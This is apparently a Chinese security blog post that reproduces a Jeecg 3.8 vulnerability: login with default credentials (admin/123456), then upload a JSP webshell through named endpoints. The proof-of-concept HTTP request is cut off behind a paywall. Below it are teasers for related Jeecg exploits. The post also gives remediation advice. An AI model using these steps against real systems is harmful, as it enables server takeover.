Jeecg弱口令后台上传getShell渗透测试

最新推荐文章于 2026-03-26 10:27:53 发布
原创 最新推荐文章于 2026-03-26 10:27:53 发布 · 4.7k 阅读 · 2
标签
#渗透测试 #信息安全 #数据安全
Jeecg是一款基于代码生成器的智能开发平台。本文揭示了其3.8版本中存在的安全漏洞,包括通过弱口令登录后利用特定URL进行文件上传攻击的方法,并提供了一个PoC示例。此外,还提出了修改默认密码和限制文件上传类型的修复建议。

前言

Jeecg(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能快速提高开发效率,帮助公司节省人力成本,同时又不失灵活性。

影响版本

jeecg v_3.8

漏洞复现

1.使用弱口令登录系统 admin/123456

2.进入后台后访问url 上传文件(绕过)

/jeecgFormDemoController.do?commonUpload

3.拦截修改文件名后发送,查看响应返回了上传的jsp路径

poc

POST /cgUploadController.do?ajaxSaveFile&sessionId=55F38FB8EA964ABD8CB45203CACB5419 HTTP/1.1
Host: xxxx
Content-Length: 1064
Origin: http://xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
最低0.47元/天 解锁文章
Jeecg commonController 任意文件上传漏洞复现
0xSec
04-05 2741
JEECG(J2EE Code Generation) 是开源的代码生成平台,目前官方已停止维护。由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行,导致服务器被控。
工具分享 | jeecg- - 一款JeecgBoot综合漏洞利用工具,一键getshell
IT软件汇
09-13 2002
工具分享 | jeecg- - 一款JeecgBoot综合漏洞利用工具,一键getshell
Jeecg-Boot弱口令漏洞实战:从后台渗透到远程代码执行
最新发布
weixin_29322855的博客
03-26 353
本文深入分析了Jeecg-Boot平台的弱口令漏洞及其安全风险,详细介绍了从后台渗透到远程代码执行(RCE)的实战过程。通过自动化检测方法和文件上传漏洞利用技巧,展示了如何有效防范和修复此类安全隐患,为企业提供了全面的安全建议和防御措施。
【高危】 jeecg-boot/积木报表基于H2驱动的任意代码执行漏洞
murphysec的博客
08-17 1503
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。
文件上传漏洞实战getshell
zkaqlaoniao的博客
11-03 829
html,jpg,txt,png等相关后缀可以进行上传,但进行jsp等相关的后缀并不能成功。如果是白名单,返回的页面只会显示:只能上传jpg,png等相关图片的后缀,但他并没有显示,所以初步判断这里是黑名单,之后进行上传图片马,还有通过空格,.,%00截断,来进行绕过。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.之后未授权获取到注册用户的页面中,发现有一个上传图片进行上传
漏洞复现--JeecgBoot testConnection 远程代码执行
qq_53003652的博客
12-20 7176
JeecgBoot 是一款基于代码生成器的低代码开发平台,该产品存在testConnection 远程命令执行漏洞。JeecgBoot积木报表。
Jeecg后台弱口令漏洞实战:从登录到文件上传getShell全流程解析
weixin_29323273的博客
02-14 510
本文详细解析了Jeecg后台弱口令漏洞导致的安全风险,从信息收集、弱口令爆破登录,到深入后台寻找并利用文件上传功能getShell的全流程。文章通过实战案例,揭示了默认配置与权限校验缺失带来的严重危害,并提供了针对性的防御加固建议,帮助企业提升系统安全性。
Jeecg-Boot 3.8版本弱口令实战:从后台登录到getShell的完整复现与防御指南
aa123的博客
02-19 886
本文深度剖析了Jeecg-Boot 3.8版本因弱口令导致后台沦陷,并进一步通过权限提升、文件上传漏洞实现getShell的完整攻击链。文章旨在从防御视角出发,详细复现攻击路径,并为开发与安全人员提供从身份认证、权限控制到文件上传安全、供应链安全等多维度的纵深防御实践指南。
JeecgBoot弱口令漏洞实战:从后台渗透到内网横向移动
weixin_29323049的博客
02-16 371
本文深入剖析了JeecgBoot平台因弱口令漏洞引发的安全风险。攻击者利用默认或简单密码进入后台,通过文件上传功能获取服务器控制权(GetShell),并以此为跳板进行内网横向移动,窃取敏感数据。文章揭示了从外网渗透到内网漫游的完整攻击链,并提供了强口令策略、文件上传校验、网络隔离等关键防御建议,帮助企业筑牢安全防线。
web漏洞-Jeecg-Boot存在未授权访问
热门推荐
qq_35578446的博客
03-15 1万+
一、介绍 Jeecg-Boot是一款基于BPM的低代码平台,零代码开发!采用前后端分离架构: SpringBoot 2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码!!帮助Java项目解决70%的重复工作,让开发更关注业务逻辑,既能快速提高效率,节省研发成本,同时又不失灵活性!同时具备更强大的低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等...
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 3471
JeecgBootjeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
2.定时任务实现
weixin_46666822的博客
10-17 1232
定时任务服务模块:配置好数据源信息就可以启动服务了启动后可以登陆管理界面账号:admin密码:123456。
Jeecg 文件上传漏洞补丁说明
JEECG官方博客
07-05 1440
产品名字:Jeecg低代码平台 问题:文件上传至tomcat内,如上传jsp文件,可能造成脚本攻击 处理情况: 已经处理 处理方案:对于正常界面操作的组件上会有上传文件类型的控制,对于模拟http请求的上传,需要在上传处理文件的接口作文件名后缀限制,拿到下面补丁包,将代码拷贝至项目src目录。 补丁包下载: 链接:https://pan.baidu.com/s/1xC3sTzpIGiGbbDB2eDJYAA 提取码:y04a ...
Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现
weixin_45908624的博客
09-11 4390
JeecgBoot 前台接口SQL注入漏洞
JAVA学习笔记JEECG BOOT介绍
CSDNXXCQ的博客
04-01 3749
JEECG JEECG BOOT 低代码开发平台(前后端分离版本) 当前最新版本: 3.1.0(发布日期:2022-03-01) AUR GitHub stars GitHub forks 项目介绍: Java Low Code Platform for Enterprise web applications JeecgBoot 是一款基于代码生成器的低代码平台!前后端分离架构 SpringBoot2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shir
Jeecg-boot使用心得
mkldxnh的博客
04-23 3352
增删改查代码引入后端后,jeecg-boot使用的是shiro进行授权和鉴权,需要对角色进行增删改的授权操作。
CVE-2023-1454注入分析复现
蚁景网安学院
07-17 2406
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
Jeecg 任意文件下载漏洞
一个安全研究员
02-17 6476
就这?
jeecg信息泄露+文件上传=》RCE
公众号shadow sock7
03-19 5845
创建jeecg数据库,然后执行命令: create database /jeecg; source /Users/xxx/repos/jeecg-master/docs/jeecg_3.8_mysql.sql
JeecgBootSql二次注入复现
weixin_45803562的博客
03-23 1871
漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值